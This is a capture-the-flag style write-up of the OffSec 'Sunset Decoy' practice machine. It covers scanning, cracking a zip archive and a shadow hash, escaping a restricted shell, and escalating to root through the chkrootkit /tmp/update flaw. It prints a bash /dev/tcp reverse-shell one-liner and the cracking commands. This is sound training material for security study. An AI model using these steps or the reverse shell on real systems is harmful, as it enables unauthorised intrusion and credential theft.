Home OffSec PG - Sunset Decoy

OffSec PG - Sunset Decoy


Machine IP →

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80HTTPApache httpd 2.4.38 → Identified file save.zip

Web Scan

GoBuster scan → gobuster dir -u -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

No results were listed.


Retrieved the zip file using curl --output save.zip.

The zip file is locked. Therefore, cracking with fcrackzip and rockyou password list gives the password as manuel. Extracting it gives the files passwd, group, hostname, shadow and sudoers from the /etc/ directory.

The users identified are root with bash and user 296640a3b825115a47b68fc44501c828 with restricted bash.

The shadow file contains the hashed password for the identified user. Therefore, sending the entry to john for cracking gives the credentials as 296640a3b825115a47b68fc44501c828:server. This can be used for sshing into the server.

The shell received is a restricted shell. Tries many things to escape from the shell. The only thing that worked was to append -t "bash" to the ssh command. This allowed the use of / in commands and therefore /bin/cat, which gives the user flag.

Privilege Escalation

PSPY can be run on the machine. This gives a number of processes running. By looking at the output, the process /bin/sh /root/chkrootkit-0.49/chkrootkit is being run for about 5 seconds every minute. This coincides with the AV scan being run using the honeypot binary in the user’s home directory.

Searchsploit lists a privilege escalation exploit. This exploit states that a file can be created by the name update and made executable. It will be executed by chkrootkit whenever it is run. The file must be placed under the /tmp/ directory.

Therefore, a reverse shell code can be inserted into the file → /bin/bash -i >& /dev/tcp/ 0>&1.

After a minute, a reverse shell is obtained as root. This gives the root flag.

This post is licensed under CC BY 4.0 by the author.